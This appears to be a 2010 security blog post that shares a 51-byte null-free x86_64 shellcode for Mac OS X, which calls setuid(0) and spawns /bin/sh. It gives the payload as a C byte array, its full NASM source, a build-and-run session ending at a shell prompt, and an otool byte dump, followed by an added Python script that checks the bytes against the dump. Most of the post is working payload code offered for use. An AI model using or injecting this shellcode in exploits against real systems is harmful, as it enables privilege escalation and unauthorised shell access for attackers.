51 Byte x86_64 OS X Null Free Shellcode
It doesn’t seem like there’s a lot of x86_64 shellcode out there for the Intel Mac platforms, so I figured I’d write my own and share it. I’m using Mac OS X 10.6.5 at the time of this post.
Instead of starting with the source and ending with the shellcode, we’re going to throw this one in reverse and get right to the shellcode. So here you have it, a 51-byte Mac OS X 64-bit setuid/shell-spawning shellcode:
    /*
     * Name: setuid_shell_x86_64
     * Qualities: Null-Free
     * Platforms: Mac OS X / Intel x86_64
     *
     * Created on: Nov 25, 2010
     * Author: Dustin Schultz - TheXploit.com
     */
    /* Declared as an array so the string literal initializes it. */
    char shellcode[] =
        "\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
        "\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
        "\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
        "\x2f\x73\x68";
And now for the source in NASM/YASM syntax. If you’ve never done system calls on 64-bit OS X and you’re confused, be sure to read my post on 64-bit system calls in OS X.
    ; File: setuid_shell_x86_64.asm
    ; Author: Dustin Schultz - TheXploit.com
    BITS 64

    section .text
    global start

    start:
    a:
        mov r8b, 0x02       ; Unix class system calls = 2
        shl r8, 24          ; shift left 24 to the upper order bits
        or r8, 0x17         ; setuid = 23, or with class = 0x2000017
        xor edi, edi        ; zero out edi (uid argument = 0)
        mov rax, r8         ; syscall number in rax
        syscall             ; invoke kernel
        jmp short c         ; jump to c
    b:
        pop rdi             ; pop ret addr which = addr of /bin//sh
        add r8, 0x24        ; execve = 59, 0x24+r8 = 0x200003b
        mov rax, r8         ; syscall number in rax
        xor rdx, rdx        ; zero out rdx (envp = NULL)
        push rdx            ; NULL terminator of the argv array, pushed backwards
        push rdi            ; argv[0] = pointer to /bin//sh
        mov rsi, rsp        ; rsi = pointer to the NULL-terminated argv array
        syscall             ; invoke the kernel
    c:
        call b              ; call b, pushes the address of the string below
        db '/bin//sh'       ; /bin/sh string
I would never blindly use shellcode without testing it out myself (unless it’s from a trusted source like Metasploit).
    nobody@nobody:~/$ nasm -f macho64 setuid_shell_x86_64.asm
    nobody@nobody:~/$ ld -arch x86_64 setuid_shell_x86_64.o
    nobody@nobody:~/$ ./a.out
    sh-3.2$
And the final byte representation (verify against the C source above):
    nobody@nobody:~/$ otool -t setuid_shell_x86_64.o
    setuid_shell_x86_64.o:
    (__TEXT,__text) section
    0000000000000000 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0
    0000000000000010 0f 05 eb 12 5f 49 83 c0 24 4c 89 c0 48 31 d2 52
    0000000000000020 57 48 89 e6 0f 05 e8 e9 ff ff ff 2f 62 69 6e 2f
    0000000000000030 2f 73 68
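The byte-for-byte comparison against the C source can be scripted instead of done by eye. This is an added example, not code from the original post: it decodes the C array and the otool -t dump as printed on this page, checks that they match, and reports the length and the offsets of any null bytes. The function names are chosen for this example, and the C-literal decoder assumes the array uses only \xNN escapes, as this one does.

```python
import re

# Copied from the C array on this page (escapes kept as text, as in the source).
C_LITERAL = r'''
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68"
'''

# Copied from the otool -t output on this page.
OTOOL_DUMP = """\
setuid_shell_x86_64.o:
(__TEXT,__text) section
0000000000000000 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0
0000000000000010 0f 05 eb 12 5f 49 83 c0 24 4c 89 c0 48 31 d2 52
0000000000000020 57 48 89 e6 0f 05 e8 e9 ff ff ff 2f 62 69 6e 2f
0000000000000030 2f 73 68
"""

def bytes_from_c_literal(text):
    """Decode the \\xNN escapes of a C string literal into bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))

def bytes_from_otool(dump):
    """Parse `otool -t` lines: a 16-hex-digit address, then byte columns."""
    out = bytearray()
    for line in dump.splitlines():
        m = re.match(r"^[0-9a-fA-F]{16}\s+((?:[0-9a-fA-F]{2}\s*)+)$", line)
        if m:  # header lines (file name, section name) do not match
            out += bytes.fromhex(m.group(1))
    return bytes(out)

def compare(c_text, dump):
    """Return (match, length, null_offsets, first_mismatch_offset)."""
    a, b = bytes_from_c_literal(c_text), bytes_from_otool(dump)
    nulls = [i for i, v in enumerate(a) if v == 0]
    diff = next((i for i, (x, y) in enumerate(zip(a, b)) if x != y), None)
    if diff is None and len(a) != len(b):
        diff = min(len(a), len(b))  # one side is a prefix of the other
    return a == b, len(a), nulls, diff

if __name__ == "__main__":
    print(compare(C_LITERAL, OTOOL_DUMP))
```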
And that’s all. Be sure to check back in the future or subscribe to my RSS feed. I definitely have more shellcode to come!
This entry was posted by Dustin Schultz on November 25, 2010 at 12:49 pm, and is filed under Security Development.